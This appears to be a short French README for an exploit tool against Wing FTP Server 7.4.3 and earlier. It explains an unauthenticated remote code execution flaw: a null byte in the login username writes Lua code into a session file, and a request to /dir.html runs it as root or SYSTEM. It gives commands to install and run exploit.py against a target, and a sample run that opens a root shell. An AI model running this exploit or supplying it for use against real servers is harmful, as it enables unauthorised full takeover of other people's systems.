
Vulnérabilité d'exécution de code à distance non authentifiée dans Wing FTP Server <= 7.4.3.
Vulnérabilité d'exécution de code à distance non authentifiée dans Wing FTP Server <= 7.4.3. Un octet nul injecté dans le paramètre
usernamelors de la connexion permet d'écrire du code Lua dans le fichier de session. Lors de l'accès à/dir.htmlavec le cookie de session obtenu, le code injecté est exécuté — en tant que root sur Linux ou SYSTEM sur Windows.
/loginok.html injecte un octet nul suivi d'un code Lua dans le champ username./dir.html avec le cookie UID renvoyé déclenche l'exécution du code Lua injecté.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
Exemple :
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root